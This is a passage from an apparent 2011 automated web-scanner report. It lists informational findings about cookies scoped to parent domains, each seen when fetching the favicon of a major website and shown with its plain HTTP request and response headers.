Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nlyudv55a1nhnnmevhefti2i; path=/; HttpOnly
Set-Cookie: UserPuid=2319845640652462039; domain=motortrend.com; expires=Sat, 02-Apr-2061 13:50:29 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 414

GIF89a.......\~.2Tr.p1...l..g.....KT[MYa...x..........    Zq~.{..c1EGJ...p..:i.j]O.l.y..IYe...}...f..g    ...~..GYfBYkEMSMW_FWf...N[cp.........p...%Rak]..MW`...cCVZ[.........h..UJBn..n..KZdjQ:...<N_IQXu..~
...[SNIP]...
13.56. http://www.netflix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netflix.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.netflix.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:42:59 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT
Content-Length: 1150
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e9145525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly

............ .h.......(....... ..... .....@....................    ...    ...    ...    ...    ........d...n.............    ...    ...    ...    ...    ...    ...    ...    ...    ....[. .#. .#. .#. .#. .#. .#. .#..    ...    ...    ...    ...    ...    ...    
...[SNIP]...
13.57. http://www.nintendo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nintendo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nintendo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:59 GMT
Server: Apache
Set-Cookie: NINTENDO=173.193.214.243.1301753939577074; path=/; expires=Thu, 31-Mar-16 14:18:59 GMT; domain=.nintendo.com
Last-Modified: Wed, 22 Jul 2009 17:26:54 GMT
ETag: "2fe8b-e36-46f4ead643380"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 14:18:59 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OTPa OUR SAMa NOR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE OTC", policyref="http://www.nintendo.com/w3c/p3p.xml"
NODE: swebe2
Content-Type: image/x-icon
Set-Cookie: BIGipServerWEB_NINTENDO=2052065290.20480.0000; path=/

..............h...&... ..............(....... ...........@........................oh............................. ........;............................................................................
...[SNIP]...
13.58. http://www.nytimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nytimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:43:13 GMT
Content-length: 1406
Content-type: image/x-icon
Set-cookie: RMID=0e1072ee0fa04d9719e1afa7; expires=Sunday, 01-Apr-2012 12:43:13 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 24 Mar 2008 16:03:01 GMT
Etag: "57e-47e7d0b5"
Accept-ranges: bytes

..............h.......(....... ....................................................................ooo.___.OOO.???.///...............................................................................
...[SNIP]...
13.59. http://www.officedepot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officedepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 3978
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 13:39:10 GMT
Date: Sat, 02 Apr 2011 13:39:10 GMT
Connection: close
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta h
...[SNIP]...
13.60. http://www.okcupid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okcupid.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okcupid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302
Date: Sat, 02 Apr 2011 13:40:27 GMT
Connection: close
Server: OKWS/3.1.7
Location: http://cdn.okcimg.com/_img/layout2/favicon_new.ico
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="http://www.okcupid.com/w3c/p3p.xml"
Set-Cookie: guest=9282563596558295837; expires=Sun, 01 Apr 2012 13:40:27 GMT; path=/; domain=okcupid.com

13.61. http://www.pbs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pbs.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:24 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=92e71d9857c8638d8750a317a271ed51; path=/; domain=.pbs.org
Last-Modified: Thu, 15 Nov 2001 16:43:13 GMT
ETag: "312715-1266-392cefa74aa40"
Accept-Ranges: bytes
Content-Length: 4710
Cache-Control: max-age=10368000
Expires: Sun, 31 Jul 2011 13:35:24 GMT
Content-Type: image/x-icon

...... ..........F... ......................h...............(...>...(... ...@...................................................


.............................$$$.%%%.'''.***.+++.888.<<<.???.DDD.KK
...[SNIP]...
13.62. http://www.pizzahut.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pizzahut.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pizzahut.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 03 Mar 2009 19:15:15 GMT
Accept-Ranges: bytes
ETag: "b14e361349cc91:7d6"
X-Powered-By: ASP.NET
Content-Length: 1150
Cache-Control: max-age=73717
Date: Sat, 02 Apr 2011 13:36:41 GMT
Connection: close
Set-Cookie: WEBTRENDS_ID=6dce8f18f46000006926974d5fc705005eb80000; expires=Thu, 30-Dec-2010 18:50:11 GMT; path=/
Set-Cookie: www-origin=yeti-DC-WASHINGTON-511; path=/; domain=.pizzahut.com
Set-Cookie: www-origin-reset=1; expires=Mon, 02-May-2011 13:36:41 GMT; path=/; domain=.pizzahut.com

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
13.63. http://www.playlist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playlist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playlist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sat, 02 Apr 2011 13:28:05 GMT
Content-Type: image/x-icon
Connection: keep-alive
Last-Modified: Wed, 16 Sep 2009 18:33:08 GMT
Accept-Ranges: bytes
Content-Length: 402
Vary: Accept-Encoding
Set-Cookie: nuid=CgABl02XJGVtzVZFFlaZAg==; expires=Sun, 01-Apr-12 13:28:05 GMT; domain=.playlist.com; path=/

.PNG
.
...IHDR...............h6....tEXtSoftware.Adobe ImageReadyq.e<...4IDATx..R;N.0....( .AEI....h)...J:J(h.WBTp..(.h)i..\.%...=L.......O.....x..._b....M..x....:.j..Y+3..r^.~...Y.|{,.PY*4r.L.BH.LI.
...[SNIP]...
13.64. http://www.potterybarn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.potterybarn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.potterybarn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1406-1301028802000"
Last-Modified: Fri, 25 Mar 2011 04:53:22 GMT
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close
Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:10 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974dde5e000099500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; path=/; domain=.potterybarn.com

..............h.......(....... .......................................................


..................................+++.333.666.888.<<<.JJJ.NNN.QQQ.RRR.TTT.UUU.VVV.WWW.XXX.aaa.jjj...........
...[SNIP]...
13.65. http://www.progressive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.progressive.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.progressive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:02 GMT
Content-Type: image/x-icon
Content-Location: http://www.progressive.com/favicon.ico
Last-Modified: Mon, 14 Jul 2008 17:26:23 GMT
Accept-Ranges: bytes
ETag: "90e7f8bcd6e5c81:ca5"
Server: Microsoft-IIS/6.0
P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.progressive.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e2d8848e783d41c387116140aecf48e2; path=/; domain=.progressive.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Set-Cookie: TLTSID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/
Set-Cookie: TLTHID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/
Set-Cookie: TLTUID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/; expires=Sat, 02-04-2021 13:45:02 GMT
Content-Length: 10078

..............4...&...93.......$..Z...(........................................X#.Y".Z!.d2......................................u.Z".Z%.U"........*...............................Y%.X#.Y&.l:...........
...[SNIP]...
13.66. http://www.qvc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qvc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qvc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
Location: /favicon.ico?&cookie=set
Content-Length: 0
Expires: Sat, 02 Apr 2011 13:36:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:24 GMT
Connection: close
Set-Cookie: site=IIS; domain=.qvc.com; path=/; expires=04-Apr-2011 12:00:00 EST
Set-Cookie: dc=IIS; domain=.qvc.com; path=/
Set-Cookie: cae_browser=desktop; expires=Sat, 02-Apr-2011 15:36:24 GMT; path=/; domain=.qvc.com

13.67. http://www.qwest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qwest.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qwest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:27 GMT
Server: Apache
Set-Cookie: TLTHID=362214305D2E105D003BFDF5C24DBE16; Path=/; Domain=.qwest.com
Set-Cookie: TLTSID=362214305D2E105D003BFDF5C24DBE16; Path=/; Domain=.qwest.com
Last-Modified: Mon, 30 Mar 2009 13:45:20 GMT
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

..............h.......(....... ...........@.........................................................t...............s...............6...........................A.......................................
...[SNIP]...
13.68. http://www.seniorpeoplemeet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seniorpeoplemeet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.seniorpeoplemeet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 5430
Content-Type: image/x-icon
Content-Location: http://www.seniorpeoplemeet.com/favicon.ico
Last-Modified: Thu, 03 Feb 2011 22:30:36 GMT
Accept-Ranges: bytes
ETag: "2a7e15faf1c3cb1:539"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 14:09:06 GMT
Set-Cookie: NSC_QN-Tfojps=ffffffff09099c8d45525d5f4f58455e445a4a423660;Version=1;Max-Age=18000;path=/;domain=.seniorpeoplemeet.com;httponly

............ .h...&... .... .........(....... ..... .....@..................................................................................................................k...s......................
...[SNIP]...
13.69. http://www.sfgate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sfgate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:14 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751794799394; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Thu, 12 Aug 2004 16:20:01 GMT
ETag: "3e1a58-37e-3e17756a8640c"
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding
Content-Type: image/x-icon

..............h.......(....... ...........@.........................................................................................................................33.33.33.33.33.33.33.33.33.33.33.33.
...[SNIP]...
13.70. http://www.sharebuilder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharebuilder.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sharebuilder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 120
Content-Type: text/html; charset=utf-8
Location: /
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=48060E2F4787FE63D9C25ABE8201A785; Path=/; Domain=.sharebuilder.com
Set-Cookie: TLTSID=48060E2F4787FE63D9C25ABE8201A785; Path=/; Domain=.sharebuilder.com
HostName: A110
Date: Sat, 02 Apr 2011 13:43:01 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f">here</a>.</h2>
</body></html>
13.71. http://www.terra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.terra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:41 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753981.696717; path=/; expires=Fri, 01-Jan-2016 00:02:40 GMT; domain=.terra.com
Last-Modified: Tue, 05 Dec 2006 21:40:32 GMT
ETag: "1808f-14a6-423e250cc7400"
Accept-Ranges: bytes
Content-Length: 5286
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

..............h...6...........`....... ..............(....... ...........@.............................................................................................................................
...[SNIP]...
13.72. http://www.thefind.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefind.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:08 GMT
Server: Apache
Set-Cookie: flsid=6c696ac09826ae214b6b34932fd74779; path=/
Expires: Sat, 02 Apr 2011 12:53:08 GMT
Cache-Control: public, s-maxage=600, max-age=600
Last-Modified: Thu, 31 Mar 2011 05:45:57 GMT
Set-Cookie: fl-uid=c4b368f36983c5eb4b2448a842ace642%2C1%2C1301748188; expires=Sun, 01-Apr-2012 12:43:08 GMT; path=/; domain=.thefind.com
Content-Language: en
Status: 200 OK
Content-Length: 1406
Content-Type: image/x-icon; charset=utf-8

..............h.......(....... ........................................................................................................................................................................
...[SNIP]...
13.73. http://www.thehollywoodgossip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: mut=173.193.214.243.1301751604816322; path=/; expires=Sat, 30-Apr-11 13:40:04 GMT; domain=.thehollywoodgossip.com
Last-Modified: Thu, 21 Jan 2010 21:11:14 GMT
ETag: "4105de-cbe-47db324a12080"
Accept-Ranges: bytes
Content-Length: 3262
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:40:04 GMT
Vary: User-Agent
Connection: close
Content-Type: image/x-icon

...... ..............(... ...@...............................###..............................#)#......krgBQC......_fZ....................................###...............................&.......
...[SNIP]...
13.74. http://www.ticketmaster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ticketmaster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "57e-b383d900"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:24:52 GMT
Connection: close
Set-Cookie: SID=nD7GlUEnkxIP7ANtKRu_CqupVk7ohnaWjtsXe2PfX3lEBQ0y0XLy9mY0z8iGhhi7LrunY3_V4W0yuO2C; path=/; domain=.ticketmaster.com
Set-Cookie: BID=lz41VXDuH8Qe3yaFuANwwdc3BoxcSfn9rNCei9TRY0xbrM0XOwjSaO9-SbjUBaNKf_diTAs_bb8iLBHP7ztS; path=/; domain=.ticketmaster.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=NVcfObc34CW8xvG3eaHZhEljjPhSeod21tXLKa8jNojh1fiM0CkpSQ==; path=/

..............h.......(....... ...........@............................wf.....U3".....3.......fUD.D"......wfU...w.........fD3.3.......D...U"..U3..f3".............wUD.wUU..fU...........................
...[SNIP]...
13.75. http://www.travelocity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelocity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:08 GMT
Server: Apache
Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT
Set-Cookie: tyrg1st=8FE61A00E4F9500A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com
Last-Modified: Tue, 30 Mar 2004 00:21:00 GMT
ETag: "57e"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding
Connection: close
Content-Type: image/x-icon

..............h.......(....... .....................................9......X...[....|...S...........Z.....C...Y....V..Y.....6..U......../...7...*..d*.....Z.....N..h....S.......C.......)..n..f.....t.I.
...[SNIP]...
13.76. http://www.true.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.true.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.true.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 20 Jul 2004 18:39:21 GMT
Accept-Ranges: bytes
ETag: "8012ddf886ec41:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:39 GMT
Content-Length: 894
Set-Cookie: NSC_xxx-mc-hsq=445337273660;path=/;domain=true.com

..............h.......(....... ...............H...H......................................................................................................................0.}%..*..*.(..*..*.|#..P......
...[SNIP]...
13.77. http://www.uhaul.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uhaul.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uhaul.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Fri, 13 Aug 2010 17:37:08 GMT
Accept-Ranges: bytes
ETag: "3bc28f27e3bcb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=0F8F14C64A2E7D1EA96C289BDA4E02E6; Path=/; Domain=.uhaul.com
Set-Cookie: TLTUID=0F8F14C64A2E7D1EA96C289BDA4E02E6; Path=/; Domain=.uhaul.com; expires=Sat, 02-04-2021 13:57:29 GMT
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:28 GMT
Content-Length: 1438

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...
13.78. http://www.united.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.united.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.united.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8a
Set-Cookie: v1st=DDE5B3A5816CD2D9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.united.com
Last-Modified: Fri, 04 Mar 2011 06:10:29 GMT
Accept-Ranges: bytes
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: fullsite
Set-Cookie: NSC_Vojufe_HSQ=ffffffffd25f668d45525d5f4f58455e445a4a423660;Version=1;path=/;httponly

..............h.......(....... ....................................g.e>.....k....H%.zX....O#...._....=..1..3..g@.Z7.......H..Y4........x..i.=.......`8.,..3..qN.>.........s./..wU....xV..m.vS.......vT
...[SNIP]...
13.79. http://www.veoh.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
